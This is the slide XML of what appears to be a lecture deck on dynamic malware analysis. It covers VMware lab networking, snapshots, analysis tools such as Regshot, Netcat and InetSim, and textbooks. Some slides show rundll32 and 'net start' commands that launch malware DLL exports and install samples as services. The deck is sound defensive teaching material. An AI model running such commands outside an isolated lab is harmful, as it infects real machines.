            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="25560">
              <a:solidFill>
                <a:srgbClr val="395e89"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
          <p:txBody>
            <a:bodyPr anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:tabLst>
                  <a:tab algn="l" pos="0"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>VMNet</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="308" name="CustomShape 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2196000" y="5272200"/>
              <a:ext cx="1007640" cy="531360"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="21600">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="21600"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="9360">
              <a:solidFill>
                <a:srgbClr val="4a7dba"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="309" name="CustomShape 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="2195280" y="5805000"/>
              <a:ext cx="1007640" cy="621720"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="21600">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="21600"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="9360">
              <a:solidFill>
                <a:srgbClr val="4a7dba"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="CustomShape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431640" y="1194480"/>
            <a:ext cx="6322320" cy="1586160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="395e89"/>
            </a:solidFill>
            <a:prstDash val="dot"/>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="CustomShape 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431640" y="3219120"/>
            <a:ext cx="4302000" cy="3521880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="395e89"/>
            </a:solidFill>
            <a:prstDash val="dot"/>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312" name="CustomShape 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6660360" y="1770480"/>
            <a:ext cx="223200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Host-only Networking</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="CustomShape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6754320" y="3412800"/>
            <a:ext cx="2146680" cy="146268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Custom Networking</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285840" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>VMNet0: Bridging</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285840" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>VMNet8: NAT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Dynamic Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1196640"/>
            <a:ext cx="303444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Snapshot</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Restore points</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="316" name="Google Shape;531;p49" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3542760" y="1700640"/>
            <a:ext cx="5506920" cy="453600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Text-books</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1196640"/>
            <a:ext cx="6766920" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="97000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>Michael Sikorski and Andrew Honig, “</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>Practical Malware Analysis: The Hands-on Guide to Dissecting Malicious Software</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>”, No Starch Press, ISBN-10: 1-59327-290-1</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pP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tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>Dennis Yurichev, “</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>Reverse Engineering for Beginners</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>”, 2013-2015.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="107" name="Google Shape;125;p5" descr="Káº¿t quáº£ hÃ¬nh áº£nh cho Practical Malware Analysis: The Hands-on Guide to Dissecting Malicious"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7224480" y="1124640"/>
            <a:ext cx="1834560" cy="2425320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="108" name="Google Shape;126;p5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7221960" y="3874680"/>
            <a:ext cx="1823400" cy="2578320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9360">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:miter/>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Dynamic Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318"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Techniques and tools</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Sandbox: Cucco, Norman, GFI, Anubis, Joe, …</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Process Monitor/Explorer</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Regshot </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ApateDNS, Netcat…</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Wireshark</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InetSim: Linux-based</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-107640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-107640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>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Dynamic Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320"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Running Malware</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Double-click: EXE, DLL</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Apply </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>rundll32.exe</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pP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tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Export arguments: by using </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>PEview</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> hoặc </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>PE Explorer</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>.</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tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>E.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>rip.dll </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>(export : </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Install </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> và </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Uninstall</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>; ipr32x.dll  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>(export: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>InstallService</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-107640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1907640" y="2837880"/>
            <a:ext cx="5249880" cy="94428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2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>C:\rundll32.exe  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>DLLname</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>Export arguments</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2051640" y="5200920"/>
            <a:ext cx="4608000" cy="82260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2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>C:\rundll32.exe  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>rip.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>Install</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2074680" y="5877360"/>
            <a:ext cx="6025320" cy="118836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2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>C:\rundll32.exe  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>ipr32xdll</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>InstallService ServiceName</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>C:\net start </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>ServiceName</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Dynamic Malware Analysis</a:t>
            </a:r>
